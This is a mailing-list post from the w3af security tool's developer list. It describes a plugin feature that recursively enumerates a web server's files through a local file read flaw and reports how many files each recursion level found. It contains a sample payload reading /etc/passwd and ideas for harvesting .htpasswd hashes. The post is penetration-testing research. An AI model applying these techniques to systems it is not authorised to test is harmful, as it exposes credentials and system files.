Updated numbers,

On Sun, Dec 28, 2008 at 1:24 AM, Andres Riancho
<andres.rian...@gmail.com> wrote:
> List,
>
>    Last Friday at the office one of the guys found a vulnerability in
> a web application, the vulnerability was the classic
> index.php?filename=/etc/passwd that let's you read the content of any
> file given that you know it's location and apache has the correct
> permissions to read it.
>
>    After that, I slightly modified the attack.localFileReader plugin
> from w3af in order to work as expected, and during the last hour I've
> been playing with a nice idea, that I wanted to share. The idea is
> pretty simple, but I haven't seen it implemented in any other
> software. First of all, a small introduction to
> attack.localFileReader: basically you only have one command, "cat",
> which allows you to print the content of a file using a local file
> inclusion/read vulnerability. Using that, I wanted to obtain a list of
> files that may contain important information for me as a penetration
> tester from the remote web server... so basically I added the "list"
> command, that operates as follows:
>
> - cat a non existent file, and save the response
> - cat a lot of common files, and compare them with the non existent
> response, if they differ, then the file exists
> - for all the files that I just found, parse them, and try to find
> references to other files. For example, if I found out that
> /etc/init.d/apache2 exists, and I parse it, I would obtain a list with
> (for example) /bin/sh, /usr/sbin/apache2ctl, /usr/sbin/htcacheclean,
> etc.
> - for every reference found in any of the previous files, run the process 
> again.
>
>    At first I thought that this would give me a few files out of the
> ones I already know that were there, and that I would hit a dead end
> after calling the method recursively one or two times. But I was
> mistaken, and I'm happy to say it =) Here are some results:
>
> Recursion level 0, 15 unique files.
> Recursion level 1, 37 unique files.
> Recursion level 2, 60 unique files.
> Recursion level 3, 1162 unique files.
> Recursion level 4, 2903 unique files.

Recursion level 5, 3483 unique files.
Recursion level 6, 4454 unique files.

>    I wanted to test it with a recursion level greater than 4, but it
> took too much time. For those who are curious, see the attached file
> for a run of the attack plugin.
>
>    After finishing my implementation, I started to wonder... what
> else could be achieved (in an automated fashion of course) using a
> local file read vulnerability? Here are some ideas that I still have
> to add to the plugin:
>
>    - OS identification: Easy one, because you could just "cat
> /etc/debian_version", and if it's there, you know it's debian and the
> content of the file tells you what version you are using (some
> problems with Ubuntu may arise).
>
>    - .htaccess and .htpasswd files that may contain weak hashes: For
> every directory that the list command finds, we could request
> /directory/.htaccess and /directory/.htpasswd . Too many requests?
> Maybe request .ht* only for directories that contain "www" or "htdocs"
> or something like that?
>
>    Can you think about other interesting techniques that can be
> applied to this vulnerability in order to gain more information about
> the target server? Thanks for your input!
>
> Cheers,
> --
> Andres Riancho
> http://w3af.sourceforge.net/
> Web Application Attack and Audit Framework
>



-- 
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework

------------------------------------------------------------------------------
_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop

Reply via email to